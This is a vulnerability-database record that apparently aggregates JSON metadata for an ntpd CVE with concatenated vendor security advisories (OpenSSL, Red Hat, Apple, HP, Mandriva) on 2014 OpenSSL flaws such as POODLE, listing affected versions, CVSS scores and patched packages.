      {
        "db": "CERT/CC",
        "id": "VU#852879"
      },
      {
        "db": "VULMON",
        "id": "CVE-2014-9295"
      },
      {
        "db": "BID",
        "id": "71761"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-007352"
      },
      {
        "db": "PACKETSTORM",
        "id": "129716"
      },
      {
        "db": "PACKETSTORM",
        "id": "129793"
      },
      {
        "db": "PACKETSTORM",
        "id": "134756"
      },
      {
        "db": "PACKETSTORM",
        "id": "130140"
      },
      {
        "db": "PACKETSTORM",
        "id": "130481"
      },
      {
        "db": "PACKETSTORM",
        "id": "129693"
      },
      {
        "db": "PACKETSTORM",
        "id": "133517"
      },
      {
        "db": "PACKETSTORM",
        "id": "129683"
      },
      {
        "db": "PACKETSTORM",
        "id": "129723"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-9295"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-12-19T00:00:00",
        "db": "CERT/CC",
        "id": "VU#852879"
      },
      {
        "date": "2014-12-20T00:00:00",
        "db": "VULMON",
        "id": "CVE-2014-9295"
      },
      {
        "date": "2014-12-19T00:00:00",
        "db": "BID",
        "id": "71761"
      },
      {
        "date": "2014-12-24T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-007352"
      },
      {
        "date": "2014-12-24T16:34:30",
        "db": "PACKETSTORM",
        "id": "129716"
      },
      {
        "date": "2015-01-05T16:17:48",
        "db": "PACKETSTORM",
        "id": "129793"
      },
      {
        "date": "2015-12-10T17:24:17",
        "db": "PACKETSTORM",
        "id": "134756"
      },
      {
        "date": "2015-01-29T06:07:22",
        "db": "PACKETSTORM",
        "id": "130140"
      },
      {
        "date": "2015-02-19T19:22:00",
        "db": "PACKETSTORM",
        "id": "130481"
      },
      {
        "date": "2014-12-23T15:41:03",
        "db": "PACKETSTORM",
        "id": "129693"
      },
      {
        "date": "2015-09-10T00:10:00",
        "db": "PACKETSTORM",
        "id": "133517"
      },
      {
        "date": "2014-12-22T17:15:48",
        "db": "PACKETSTORM",
        "id": "129683"
      },
      {
        "date": "2014-12-26T15:46:55",
        "db": "PACKETSTORM",
        "id": "129723"
      },
      {
        "date": "2014-12-20T02:59:02.693000",
        "db": "NVD",
        "id": "CVE-2014-9295"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-10-27T00:00:00",
        "db": "CERT/CC",
        "id": "VU#852879"
      },
      {
        "date": "2021-11-17T00:00:00",
        "db": "VULMON",
        "id": "CVE-2014-9295"
      },
      {
        "date": "2016-10-26T04:13:00",
        "db": "BID",
        "id": "71761"
      },
      {
        "date": "2017-03-09T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-007352"
      },
      {
        "date": "2021-11-17T22:15:38.877000",
        "db": "NVD",
        "id": "CVE-2014-9295"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "129716"
      },
      {
        "db": "PACKETSTORM",
        "id": "129793"
      },
      {
        "db": "PACKETSTORM",
        "id": "134756"
      },
      {
        "db": "PACKETSTORM",
        "id": "129723"
      }
    ],
    "trust": 0.4
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "NTP Project Network Time Protocol daemon (ntpd) contains multiple vulnerabilities (Updated)",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#852879"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Input Validation Error",
    "sources": [
      {
        "db": "BID",
        "id": "71761"
      }
    ],
    "trust": 0.3
  }
}

VAR-201410-1144

Vulnerability from variot - Updated: 2024-07-23 21:24

Memory leak in the tls_decrypt_ticket function in t1_lib.c in OpenSSL before 0.9.8zc, 1.0.0 before 1.0.0o, and 1.0.1 before 1.0.1j allows remote attackers to cause a denial of service (memory consumption) via a crafted session ticket that triggers an integrity-check failure. OpenSSL is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. OpenSSL prior to 0.9.8zc, 1.0.0o, and 1.0.1j are vulnerable. This could be exploited in a Denial Of Service attack. This issue affects OpenSSL 1.0.1 server implementations for both SSL/TLS and DTLS regardless of whether SRTP is used or configured. Implementations of OpenSSL that have been compiled with OPENSSL_NO_SRTP defined are not affected.

This issue was reported to OpenSSL on 26th September 2014, based on an original issue and patch developed by the LibreSSL project. Further analysis of the issue was performed by the OpenSSL team.

The fix was developed by the OpenSSL team.

This issue was reported to OpenSSL on 8th October 2014.

The fix was developed by Stephen Henson of the OpenSSL core team.

SSL 3.0 Fallback protection

Severity: Medium

OpenSSL has added support for TLS_FALLBACK_SCSV to allow applications to block the ability for a MITM attacker to force a protocol downgrade.

Some client applications (such as browsers) will reconnect using a downgraded protocol to work around interoperability bugs in older servers. This could be exploited by an active man-in-the-middle to downgrade connections to SSL 3.0 even if both sides of the connection support higher protocols. SSL 3.0 contains a number of weaknesses including POODLE (CVE-2014-3566).

https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00 https://www.openssl.org/~bodo/ssl-poodle.pdf

Support for TLS_FALLBACK_SCSV was developed by Adam Langley and Bodo Moeller.

Build option no-ssl3 is incomplete (CVE-2014-3568)

Severity: Low

When OpenSSL is configured with "no-ssl3" as a build option, servers could accept and complete a SSL 3.0 handshake, and clients could be configured to send them.

This issue was reported to OpenSSL by Akamai Technologies on 14th October 2014.

The fix was developed by Akamai and the OpenSSL team.

References

URL for this Security Advisory: https://www.openssl.org/news/secadv_20141015.txt

Note: the online version of the advisory may be updated with additional details over time.

For details of OpenSSL severity classifications please see: https://www.openssl.org/about/secpolicy.html

. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Important: openssl security update Advisory ID: RHSA-2014:1692-01 Product: Red Hat Storage Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1692.html Issue date: 2014-10-22 CVE Names: CVE-2014-3513 CVE-2014-3567 =====================================================================

Summary:

Updated openssl packages that contain a backported patch to mitigate the CVE-2014-3566 issue and fix two security issues are now available for Red Hat Storage 2.1.

Relevant releases/architectures:

Red Hat Storage Server 2.1 - x86_64

Description:

OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL), Transport Layer Security (TLS), and Datagram Transport Layer Security (DTLS) protocols, as well as a full-strength, general purpose cryptography library.

This update adds support for the TLS Fallback Signaling Cipher Suite Value (TLS_FALLBACK_SCSV), which can be used to prevent protocol downgrade attacks against applications which re-connect using a lower SSL/TLS protocol version when the initial connection indicating the highest supported protocol version fails.

This can prevent a forceful downgrade of the communication to SSL 3.0. The SSL 3.0 protocol was found to be vulnerable to the padding oracle attack when using block cipher suites in cipher block chaining (CBC) mode. This issue is identified as CVE-2014-3566, and also known under the alias POODLE. This SSL 3.0 protocol flaw will not be addressed in a future update; it is recommended that users configure their applications to require at least TLS protocol version 1.0 for secure communication.

For additional information about this flaw, see the Knowledgebase article at https://access.redhat.com/articles/1232123

A memory leak flaw was found in the way OpenSSL parsed the DTLS Secure Real-time Transport Protocol (SRTP) extension data. (CVE-2014-3567)

All OpenSSL users are advised to upgrade to these updated packages, which contain backported patches to mitigate the CVE-2014-3566 issue and correct the CVE-2014-3513 and CVE-2014-3567 issues. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.

Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258

Package List:

Red Hat Storage Server 2.1:

Source: openssl-1.0.1e-30.el6_6.2.src.rpm

x86_64: openssl-1.0.1e-30.el6_6.2.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.2.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.2.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.2.x86_64.rpm openssl-static-1.0.1e-30.el6_6.2.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

https://access.redhat.com/security/cve/CVE-2014-3513 https://access.redhat.com/security/cve/CVE-2014-3567 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/articles/1232123

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iD8DBQFUR/NUXlSAg2UNWIIRAlZHAJwPwsoiJDn5RhI6U8eFkIzxyQopkQCePynp RpfQCptdJIpd6WXO7pw1vVo= =T20t -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . This flaw allows a man-in-the-middle (MITM) attacker to decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.

This update adds support for Fallback SCSV to mitigate this issue. -----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA256

APPLE-SA-2015-09-16-2 Xcode 7.0

Xcode 7.0 is now available and addresses the following:

DevTools Available for: OS X Yosemite v10.10.4 or later Impact: An attacker may be able to bypass access restrictions Description: An API issue existed in the apache configuration. This issue was addressed by updating header files to use the latest version. CVE-ID CVE-2015-3185 : Branko Aibej of the Apache Software Foundation

IDE Xcode Server Available for: OS X Yosemite 10.10 or later Impact: An attacker may be able to access restricted parts of the filesystem Description: A comparison issue existed in the node.js send module prior to version 0.8.4. This issue was addressed by upgrading to version 0.12.3. CVE-ID CVE-2014-6394 : Ilya Kantor

IDE Xcode Server Available for: OS X Yosemite v10.10.4 or later Impact: Multiple vulnerabilties in OpenSSL Description: Multiple vulnerabilties existed in the node.js OpenSSL module prior to version 1.0.1j. CVE-ID CVE-2014-3513 CVE-2014-3566 CVE-2014-3567 CVE-2014-3568

IDE Xcode Server Available for: OS X Yosemite v10.10.4 or later Impact: An attacker with a privileged network position may be able to inspect traffic to Xcode Server Description: Connections to Xcode Server may have been made without encryption. This issue was addressed through improved network connection logic. CVE-ID CVE-2015-5910 : an anonymous researcher

IDE Xcode Server Available for: OS X Yosemite v10.10.4 or later Impact: Build notifications may be sent to unintended recipients Description: An access issue existed in the handling of repository email lists. This issue was addressed through improved validation. CVE-ID CVE-2015-5909 : Daniel Tomlinson of Rocket Apps, David Gatwood of Anchorfree

subversion Available for: OS X Yosemite v10.10.4 or later Impact: Multiple vulnerabilities existed in svn versions prior to 1.7.19 Description: Multiple vulnerabilities existed in svn versions prior to 1.7.19. These issues were addressed by updating svn to version 1.7.20. CVE-ID CVE-2015-0248 CVE-2015-0251

Xcode 7.0 may be obtained from: https://developer.apple.com/xcode/downloads/

To check that the Xcode has been updated:

Select Xcode in the menu bar
Select About Xcode
The version after applying this update will be "7.0".

Release Date: 2014-10-28 Last Updated: 2014-10-28

Potential Security Impact: Remote Denial of Service (DoS), unauthorized access, man-in-the-middle (MitM) attack

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP-UX running OpenSSL.

This is the SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" also known as "Poodle", which could be exploited remotely to allow disclosure of information.

References:

CVE-2014-3566 Man-in-th-Middle (MitM) attack CVE-2014-3567 Remote Unauthorized Access CVE-2014-3568 Remote Denial of Service (DoS) SSRT101767

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, B.11.31 running OpenSSL versions before v0.9.8zc

BACKGROUND

CVSS 2.0 Base Metrics

Reference Base Vector Base Score CVE-2014-3566 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2014-3567 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1 CVE-2014-3568 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided the following updates to resolve these vulnerabilities. The updates are available from the following ftp site.

ftp://ssl098zc:Secure12@ftp.usa.hp.com

User name: ssl098zc Password: (NOTE: Case sensitive) Secure12

HP-UX Release HP-UX OpenSSL version

B.11.11 (11i v1) A.00.09.08zc.001_HP-UX_B.11.11_32+64.depot

B.11.23 (11i v2) A.00.09.08zc.002_HP-UX_B.11.23_IA-PA.depot

B.11.31 (11i v3) A.00.09.08zc.003_HP-UX_B.11.31_IA-PA.depot

MANUAL ACTIONS: Yes - Update

Install OpenSSL A.00.09.08zc or subsequent

PRODUCT SPECIFIC INFORMATION

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

HP-UX B.11.11

openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: install revision A.00.09.08zc.001 or subsequent

HP-UX B.11.23

HP-UX B.11.31

END AFFECTED VERSIONS

HISTORY Version:1 (rev.1) - 28 October 2014 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

Mandriva Linux Security Advisory MDVSA-2015:062 http://www.mandriva.com/en/support/security/

Package : openssl Date : March 27, 2015 Affected: Business Server 2.0

Problem Description:

Multiple vulnerabilities has been discovered and corrected in openssl:

Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows remote attackers to inject data across sessions or cause a denial of service (use-after-free and parsing error) via an SSL connection in a multithreaded environment (CVE-2010-5298).

The Montgomery ladder implementation in OpenSSL through 1.0.0l does not ensure that certain swap operations have a constant-time behavior, which makes it easier for local users to obtain ECDSA nonces via a FLUSH+RELOAD cache side-channel attack (CVE-2014-0076).

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug (CVE-2014-0160).

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the CCS Injection vulnerability (CVE-2014-0224).

The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the POODLE issue (CVE-2014-3566). NOTE: this issue became relevant after the CVE-2014-3568 fix (CVE-2014-3569).

The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square of a BIGNUM value, which might make it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors, related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and crypto/bn/bn_asm.c (CVE-2014-3570).

The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger a loss of forward secrecy by omitting the ServerKeyExchange message (CVE-2014-3572).

OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not enforce certain constraints on certificate data, which allows remote attackers to defeat a fingerprint-based certificate-blacklist protection mechanism by including crafted data within a certificate's unsigned portion, related to crypto/asn1/a_verify.c, crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c (CVE-2014-8275).

The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate brute-force decryption by offering a weak ephemeral RSA key in a noncompliant role, related to the FREAK issue. NOTE: the scope of this CVE is only client code based on OpenSSL, not EXPORT_RSA issues associated with servers or other TLS implementations (CVE-2015-0204).

The ssl3_get_cert_verify function in s3_srvr.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k accepts client authentication with a Diffie-Hellman (DH) certificate without requiring a CertificateVerify message, which allows remote attackers to obtain access without knowledge of a private key via crafted TLS Handshake Protocol traffic to a server that recognizes a Certification Authority with DH support (CVE-2015-0205).

The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not properly handle a lack of outer ContentInfo, which allows attackers to cause a denial of service (NULL pointer dereference and application crash) by leveraging an application that processes arbitrary PKCS#7 data and providing malformed data with ASN.1 encoding, related to crypto/pkcs7/pk7_doit.c and crypto/pkcs7/pk7_lib.c (CVE-2015-0289).

The updated packages have been upgraded to the 1.0.1m version where these security flaws has been fixed.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293 http://openssl.org/news/secadv_20150108.txt http://openssl.org/news/secadv_20150319.txt

Updated Packages:

Mandriva Business Server 2/X86_64: 324a85f7e1165ab02881e44dbddaf599 mbs2/x86_64/lib64openssl1.0.0-1.0.1m-1.mbs2.x86_64.rpm 9c0bfb6ebd43cb6d81872abf71b4f85f mbs2/x86_64/lib64openssl-devel-1.0.1m-1.mbs2.x86_64.rpm 58df54e72ca7270210c7d8dd23df402b mbs2/x86_64/lib64openssl-engines1.0.0-1.0.1m-1.mbs2.x86_64.rpm b5313ffb5baaa65aea05eb05486d309a mbs2/x86_64/lib64openssl-static-devel-1.0.1m-1.mbs2.x86_64.rpm a9890ce4c33630cb9e00f3b2910dd784 mbs2/x86_64/openssl-1.0.1m-1.mbs2.x86_64.rpm 521297a5fe26e2de0c1222d8d03382d1 mbs2/SRPMS/openssl-1.0.1m-1.mbs2.src.rpm

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/en/support/security/advisories/

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com

Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFVFTm1mqjQ0CJFipgRAoYFAKCaubn00colzVNnUBFjSElyDptGMQCfaGoS kz0ex6eI6hA6qSwklA2NoXY= =GYjX -----END PGP SIGNATURE----- . Please refer to the RESOLUTION section below for a list of impacted products.

Note: mitigation instructions are included below if the following software updates cannot be applied.

Family Fixed Version HP Branded Products Impacted H3C Branded Products Impacted 3Com Branded Products Impacted CVE

12900 Switch Series R1005P15 JG619A HP FF 12910 Switch AC Chassis JG621A HP FF 12910 Main Processing Unit JG632A HP FF 12916 Switch AC Chassis JG634A HP FF 12916 Main Processing Unit

CVE-2014-3566 CVE-2014-3567 CVE-2014-3568

12500 R1828P06 JC085A HP A12518 Switch Chassis JC086A HP A12508 Switch Chassis JC652A HP 12508 DC Switch Chassis JC653A HP 12518 DC Switch Chassis JC654A HP 12504 AC Switch Chassis JC655A HP 12504 DC Switch Chassis JF430A HP A12518 Switch Chassis JF430B HP 12518 Switch Chassis JF430C HP 12518 AC Switch Chassis JF431A HP A12508 Switch Chassis JF431B HP 12508 Switch Chassis JF431C HP 12508 AC Switch Chassis JC072B HP 12500 Main Processing Unit JC808A HP 12500 TAA Main Processing Unit H3C S12508 Routing Switch(AC-1) (0235A0GE) H3C S12518 Routing Switch(AC-1) (0235A0GF) H3C S12508 Chassis (0235A0E6) H3C S12508 Chassis (0235A38N) H3C S12518 Chassis (0235A0E7) H3C S12518 Chassis (0235A38M) H3C 12508 DC Switch Chassis (0235A38L) H3C 12518 DC Switch Chassis (0235A38K)

CVE-2014-3566 CVE-2014-3568

12500 (Comware v7) R7328P04 JC085A HP A12518 Switch Chassis JC086A HP A12508 Switch Chassis JC652A HP 12508 DC Switch Chassis JC653A HP 12518 DC Switch Chassis JC654A HP 12504 AC Switch Chassis JC655A HP 12504 DC Switch Chassis JF430A HP A12518 Switch Chassis JF430B HP 12518 Switch Chassis JF430C HP 12518 AC Switch Chassis JF431A HP A12508 Switch Chassis JF431B HP 12508 Switch Chassis JF431C HP 12508 AC Switch Chassis JC072B HP 12500 Main Processing Unit JG497A HP 12500 MPU w/Comware V7 OS JG782A HP FF 12508E AC Switch Chassis JG783A HP FF 12508E DC Switch Chassis JG784A HP FF 12518E AC Switch Chassis JG785A HP FF 12518E DC Switch Chassis JG802A HP FF 12500E MPU H3C S12508 Routing Switch(AC-1) (0235A0GE) H3C S12518 Routing Switch(AC-1) (0235A0GF) H3C S12508 Chassis (0235A0E6) H3C S12508 Chassis (0235A38N) H3C S12518 Chassis (0235A0E7) H3C S12518 Chassis (0235A38M) H3C 12508 DC Switch Chassis (0235A38L) H3C 12518 DC Switch Chassis (0235A38K)

CVE-2014-3566 CVE-2014-3567 CVE-2014-3568

11900 Switch Series R2111P06 JG608A HP FF 11908-V Switch Chassis JG609A HP FF 11900 Main Processing Unit

CVE-2014-3566 CVE-2014-3567 CVE-2014-3568

10500 Switch Series (Comware v5) R1208P10 JC611A HP 10508-V Switch Chassis JC612A HP 10508 Switch Chassis JC613A HP 10504 Switch Chassis JC614A HP 10500 Main Processing Unit JC748A HP 10512 Switch Chassis JG375A HP 10500 TAA Main Processing Unit JG820A HP 10504 TAA Switch Chassis JG821A HP 10508 TAA Switch Chassis JG822A HP 10508-V TAA Switch Chassis JG823A HP 10512 TAA Switch Chassis

CVE-2014-3566 CVE-2014-3568

10500 Switch Series (Comware v7) R2111P06 JC611A HP 10508-V Switch Chassis JC612A HP 10508 Switch Chassis JC613A HP 10504 Switch Chassis JC748A HP 10512 Switch Chassis JG820A HP 10504 TAA Switch Chassis JG821A HP 10508 TAA Switch Chassis JG822A HP 10508-V TAA Switch Chassis JG823A HP 10512 TAA Switch Chassis JG496A HP 10500 Type A MPU w/Comware v7 OS

CVE-2014-3566 CVE-2014-3567 CVE-2014-3568

9500E R1828P06 JC124A HP A9508 Switch Chassis JC124B HP 9505 Switch Chassis JC125A HP A9512 Switch Chassis JC125B HP 9512 Switch Chassis JC474A HP A9508-V Switch Chassis JC474B HP 9508-V Switch Chassis H3C S9505E Routing-Switch Chassis (0235A0G6) H3C S9512E Routing-Switch Chassis (0235A0G7) H3C S9508E-V Routing-Switch Chassis (0235A38Q) H3C S9505E Chassis w/ Fans (0235A38P) H3C S9512E Chassis w/ Fans (0235A38R)

CVE-2014-3566 CVE-2014-3568

7900 R2122 JG682A HP FlexFabric 7904 Switch Chassis JH001A HP FF 7910 2.4Tbps Fabric / MPU JG842A HP FF 7910 7.2Tbps Fabric / MPU JG841A HP FF 7910 Switch Chassis

CVE-2014-3566 CVE-2014-3567 CVE-2014-3568

7500 Switch Series R6708P10 JC666A HP A7503-S 144 Gbps Fab/MPU w 24p Gig-T JC697A HP A7502 TAA Main Processing Unit JC698A HP A7503S 144 Gbps TAA Fab/MPU w 24p GbE JC699A HP A7500 384Gbps TAA Fab/MPU w 2p 10-GbE JC700A HP A7500 384 Gbps TAA Fabric / MPU JC701A HP A7510 768 Gbps TAA Fabric / MPU JD193A HP 384 Gbps A7500 Fab Mod w/2 XFP Ports JD193B HP 7500 384Gbps Fab Mod w/2 XFP Ports JD194A HP 384 Gbps Fabric A7500 Module JD194B HP 7500 384Gbps Fabric Module JD195A HP 7500 384Gbps Advanced Fabric Module JD196A HP 7502 Fabric Module JD220A HP 7500 768Gbps Fabric Module JD238A HP A7510 Switch Chassis JD238B HP 7510 Switch Chassis JD239A HP A7506 Switch Chassis JD239B HP 7506 Switch Chassis JD240A HP A7503 Switch Chassis JD240B HP 7503 Switch Chassis JD241A HP A7506 Vertical Switch Chassis JD241B HP 7506-V Switch Chassis JD242A HP A7502 Switch Chassis JD242B HP 7502 Switch Chassis JD243A HP A7503 Switch Chassis w/1 Fabric Slot JD243B HP 7503-S Switch Chassis w/1 Fabric Slot H3C S7502E Ethernet Switch Chassis with Fan (0235A0G4) H3C S7503E Ethernet Switch Chassis with Fan (0235A0G2) H3C S7503E-S Ethernet Switch Chassis with Fan (0235A0G5) H3C S7506E Ethernet Switch Chassis with Fan (0235A0G1) H3C S7506E-V Ethernet Switch Chassis with Fan (0235A0G3) H3C S7510E Ethernet Switch Chassis with Fan (0235A0G0) H3C S7502E Chassis w/ fans (0235A29A) H3C S7503E Chassis w/ fans (0235A27R) H3C S7503E-S Chassis w/ fans (0235A33R) H3C S7506E Chassis w/ fans (0235A27Q) H3C S7506E-V Chassis w/ fans (0235A27S)

CVE-2014-3566 CVE-2014-3568

HSR6800 R3303P18 JG361A HP HSR6802 Router Chassis JG362A HP HSR6804 Router Chassis JG363A HP HSR6808 Router Chassis JG364A HP HSR6800 RSE-X2 Router MPU JG779A HP HSR6800 RSE-X2 Router TAA MPU

CVE-2014-3566 CVE-2014-3568

HSR6800 Russian Version R3303P18 JG361A HP HSR6802 Router Chassis JG362A HP HSR6804 Router Chassis JG363A HP HSR6808 Router Chassis JG364A HP HSR6800 RSE-X2 Router MPU JG779A HP HSR6800 RSE-X2 Router TAA MPU

CVE-2014-3566 CVE-2014-3568

HSR6602 R3303P18 JG353A HP HSR6602-G Router JG354A HP HSR6602-XG Router JG776A HP HSR6602-G TAA Router JG777A HP HSR6602-XG TAA Router JG777A HP HSR6602-XG TAA Router

CVE-2014-3566 CVE-2014-3568

HSR6602 Russian Version R3303P18 JG353A HP HSR6602-G Router JG354A HP HSR6602-XG Router JG776A HP HSR6602-G TAA Router JG777A HP HSR6602-XG TAA Router

CVE-2014-3566 CVE-2014-3568

6602 R3303P18 JC176A HP 6602 Router Chassis H3C SR6602 1U Router Host (0235A27D)

CVE-2014-3566 CVE-2014-3568

